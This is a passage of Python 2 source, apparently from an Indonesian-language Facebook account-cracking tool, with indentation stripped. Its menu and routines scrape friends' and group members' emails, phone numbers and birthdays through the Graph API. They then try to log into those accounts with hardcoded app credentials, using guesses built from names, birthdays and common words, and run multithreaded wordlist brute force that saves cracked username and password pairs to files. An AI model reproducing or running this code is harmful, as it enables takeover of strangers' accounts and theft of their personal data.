print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
